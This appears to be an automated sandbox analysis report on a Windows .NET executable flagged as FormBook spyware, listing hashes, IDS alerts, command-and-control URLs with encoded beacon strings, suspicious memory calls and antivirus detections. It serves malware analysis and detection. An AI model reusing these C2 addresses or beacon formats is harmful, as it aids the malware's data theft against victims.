Summary | ZeroBOX

dy.exe

PE32 PE File .NET EXE
Category FILE
Machine s1_win7_x6401
Started March 29, 2023, 5:32 p.m.
Completed March 29, 2023, 5:37 p.m.
Size 1.6MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 5d2a5e49ca03081b82c5aff2eed04770
SHA256 1659286992ddaa74349568fa72aea8ba44cd5c8b46ab038fea0aef3ab8cb6948
CRC32 3856C5E7
ssdeep 24576:Ktav0R77s3GvHCVLT1UROjYRSAN0XAVUr1W:K60PqZiOAZ0AC
Yara
  • Is_DotNET_EXE - (no description)
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.101:59002 -> 164.124.101.2:53 2027863 ET INFO Observed DNS Query to .biz TLD Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 198.177.124.57:80 2027876 ET INFO HTTP Request to Suspicious *.life Domain Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 198.177.124.57:80 2027876 ET INFO HTTP Request to Suspicious *.life Domain Potentially Bad Traffic
UDP 192.168.56.101:54883 -> 8.8.8.8:53 2027867 ET INFO Observed DNS Query to .life TLD Potentially Bad Traffic
TCP 192.168.56.101:49175 -> 198.177.124.57:80 2027876 ET INFO HTTP Request to Suspicious *.life Domain Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 91.189.114.25:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 91.189.114.25:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 91.189.114.25:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 94.23.162.163:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 94.23.162.163:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 198.177.124.57:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 94.23.162.163:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 198.177.124.57:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 198.177.124.57:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 198.177.124.57:80 2027876 ET INFO HTTP Request to Suspicious *.life Domain Potentially Bad Traffic
TCP 192.168.56.101:49168 -> 46.17.173.192:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 46.17.173.192:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 46.17.173.192:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 195.110.124.133:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 195.110.124.133:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 195.110.124.133:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49164 -> 34.117.168.233:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49164 -> 34.117.168.233:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49164 -> 34.117.168.233:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 219.94.129.181:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 219.94.129.181:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 219.94.129.181:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features: GET method with no useragent header
suspicious_request: GET http://www.organiclifestyle.biz/u62a/?uyJ6NZy=VvqZGz3PHJbSx1QTtGtZ27JbTMCS5Ic5/4p6o7fkYDsqsQXV00C4Mjy3HEa1fsrCkNg75FGvKvR0eCFVX6t17fJz0m/poFYbzV0qA3k=&GqUv=WJjJdRiak0
suspicious_features: GET method with no useragent header
suspicious_request: GET http://www.coba.dev/u62a/?uyJ6NZy=o8SCP/YnJ49qk75I5z3GzELHmg2Up2LUiNCn13SbmA4goaf+g+1fYa13Odsfun9rvkIDAdpJippA+Y6N0xwu8NBanTjMGd5U2PfRiS4=&GqUv=WJjJdRiak0
suspicious_features: GET method with no useragent header
suspicious_request: GET http://www.meandclementina.com/u62a/?uyJ6NZy=sEdvL1ZGkULv2A8bNXBRaRmdYx+eWL4gYtShFj4pbN8o5eHSa3QtYRl1ZjlPIya8jQvOFXB8wZUlu2C2FpqSzuYXIQNHQFur3PZxkFI=&GqUv=WJjJdRiak0
suspicious_features: GET method with no useragent header
suspicious_request: GET http://www.marex.promo/u62a/?uyJ6NZy=HTOKBE+ideXsbClCFIZFlPYDAjUuWFn3t4knnx885+0EkjdUagvAPmmh9nOXJS6XsZrvZ1YpL3hurMR7Bu4FKovUyILBMkHn6uQL+64=&GqUv=WJjJdRiak0
suspicious_features: GET method with no useragent header
suspicious_request: GET http://www.starauctioneerspro.com/u62a/?uyJ6NZy=xxICz6/4R5ldvKit9pQiZZ+jTsTJ1UXO3+kkY3b4PoRSc/9CGhnte6tVjQSTVfHBpnO/T6bLIQt5I4s4artxGH6TeZHS/DCwG7N4VUA=&GqUv=WJjJdRiak0
suspicious_features: GET method with no useragent header
suspicious_request: GET http://www.lowcome.life/u62a/?uyJ6NZy=SpYuczb0I67O/JB79loYgv0QPNy9tmAedxSPiGXP/gajLTktWHzWDdz7w0u65687mA4BdpaJEcNqadlvkC0xWpASIIM+xKCPpUlgMWA=&GqUv=WJjJdRiak0
suspicious_features: GET method with no useragent header
suspicious_request: GET http://www.kunimi.org/u62a/?uyJ6NZy=Do2YNZmdCCnGDS2WdMJQZ6ZCKAd/GRXgo7DNSK9yFY09r/FIwMWpAWGLeKjsO9QXj5EgxT/2XN8JUIdJtTBe0orCvwywWdiUJLw1V4E=&GqUv=WJjJdRiak0
request GET http://www.organiclifestyle.biz/u62a/?uyJ6NZy=VvqZGz3PHJbSx1QTtGtZ27JbTMCS5Ic5/4p6o7fkYDsqsQXV00C4Mjy3HEa1fsrCkNg75FGvKvR0eCFVX6t17fJz0m/poFYbzV0qA3k=&GqUv=WJjJdRiak0
request GET http://www.sqlite.org/2022/sqlite-dll-win32-x86-3370000.zip
request GET http://www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
request POST http://www.coba.dev/u62a/
request GET http://www.coba.dev/u62a/?uyJ6NZy=o8SCP/YnJ49qk75I5z3GzELHmg2Up2LUiNCn13SbmA4goaf+g+1fYa13Odsfun9rvkIDAdpJippA+Y6N0xwu8NBanTjMGd5U2PfRiS4=&GqUv=WJjJdRiak0
request POST http://www.meandclementina.com/u62a/
request GET http://www.meandclementina.com/u62a/?uyJ6NZy=sEdvL1ZGkULv2A8bNXBRaRmdYx+eWL4gYtShFj4pbN8o5eHSa3QtYRl1ZjlPIya8jQvOFXB8wZUlu2C2FpqSzuYXIQNHQFur3PZxkFI=&GqUv=WJjJdRiak0
request POST http://www.marex.promo/u62a/
request GET http://www.marex.promo/u62a/?uyJ6NZy=HTOKBE+ideXsbClCFIZFlPYDAjUuWFn3t4knnx885+0EkjdUagvAPmmh9nOXJS6XsZrvZ1YpL3hurMR7Bu4FKovUyILBMkHn6uQL+64=&GqUv=WJjJdRiak0
request POST http://www.starauctioneerspro.com/u62a/
request GET http://www.starauctioneerspro.com/u62a/?uyJ6NZy=xxICz6/4R5ldvKit9pQiZZ+jTsTJ1UXO3+kkY3b4PoRSc/9CGhnte6tVjQSTVfHBpnO/T6bLIQt5I4s4artxGH6TeZHS/DCwG7N4VUA=&GqUv=WJjJdRiak0
request POST http://www.lowcome.life/u62a/
request GET http://www.lowcome.life/u62a/?uyJ6NZy=SpYuczb0I67O/JB79loYgv0QPNy9tmAedxSPiGXP/gajLTktWHzWDdz7w0u65687mA4BdpaJEcNqadlvkC0xWpASIIM+xKCPpUlgMWA=&GqUv=WJjJdRiak0
request POST http://www.kunimi.org/u62a/
request GET http://www.kunimi.org/u62a/?uyJ6NZy=Do2YNZmdCCnGDS2WdMJQZ6ZCKAd/GRXgo7DNSK9yFY09r/FIwMWpAWGLeKjsO9QXj5EgxT/2XN8JUIdJtTBe0orCvwywWdiUJLw1V4E=&GqUv=WJjJdRiak0
request POST http://www.coba.dev/u62a/
request POST http://www.meandclementina.com/u62a/
request POST http://www.marex.promo/u62a/
request POST http://www.starauctioneerspro.com/u62a/
request POST http://www.lowcome.life/u62a/
request POST http://www.kunimi.org/u62a/
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 786432
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00500000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00580000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2564
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2564
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 1310720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b60000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00392000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00550000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0057f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00570000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00551000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00552000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00553000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0039a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 188416
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01311000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0131130b
process_handle: 0xffffffff
3221225713 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008c0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\dyke bin.exe
section name: .text, virtual_address: 0x00002000, virtual_size: 0x000337d9, size_of_data: 0x00033800, entropy: 7.933774856796704
description A section with a high entropy has been found
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Bkav W32.AIDetectNet.01
Lionic Trojan.Win32.Noon.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Heur.MSIL.Jalapeno.J.36
McAfee Artemis!5D2A5E49CA03
Malwarebytes Malware.AI.4281876581
VIPRE Gen:Heur.MSIL.Jalapeno.J.36
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Alibaba TrojanSpy:MSIL/Jalapeno.bf2a76bc
K7GW Trojan ( 005a13a11 )
K7AntiVirus Trojan ( 005a13a11 )
Arcabit Trojan.MSIL.Jalapeno.J.36
Cyren W32/MSIL_Agent.DQP.gen!Eldorado
Symantec ML.Attribute.HighConfidence
tehtris Generic.Malware
ESET-NOD32 a variant of Generik.KDMJUIJ
Cynet Malicious (score: 100)
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Trojan-Spy.MSIL.Noon.gen
BitDefender Gen:Heur.MSIL.Jalapeno.J.36
Avast Win32:PWSX-gen [Trj]
Tencent Msil.Trojan-Spy.Noon.Mjgl
Zillya Trojan.Noon.Win32.27182
TrendMicro TROJ_GEN.R002C0DCM23
McAfee-GW-Edition BehavesLike.Win32.Infected.tm
Trapmine malicious.high.ml.score
FireEye Generic.mg.5d2a5e49ca03081b
Emsisoft Gen:Heur.MSIL.Jalapeno.J.36 (B)
SentinelOne Static AI - Malicious PE
Avira TR/Dropper.MSIL.Gen
MAX malware (ai score=80)
Antiy-AVL Trojan[Spy]/MSIL.Noon
Gridinsoft Ransom.Win32.Wacatac.sa
Microsoft Trojan:Win32/Leonem
ViRobot Trojan.Win.Z.Jalapeno.1641984
GData Gen:Heur.MSIL.Jalapeno.J.36
Google Detected
AhnLab-V3 Trojan/Win.Jalapeno.C5398063
Acronis suspicious
ALYac Gen:Heur.MSIL.Jalapeno.J.36
Cylance unsafe
Zoner Trojan.Win32.154580
TrendMicro-HouseCall TROJ_GEN.R002C0DCM23
Rising Spyware.Noon!8.E7C9 (CLOUD)
Yandex Trojan.Agent!/aykD+i9HE0
Ikarus Trojan.MSIL.Crypt
MaxSecure Trojan.Malware.300983.susgen
Fortinet PossibleThreat.PALLAS.H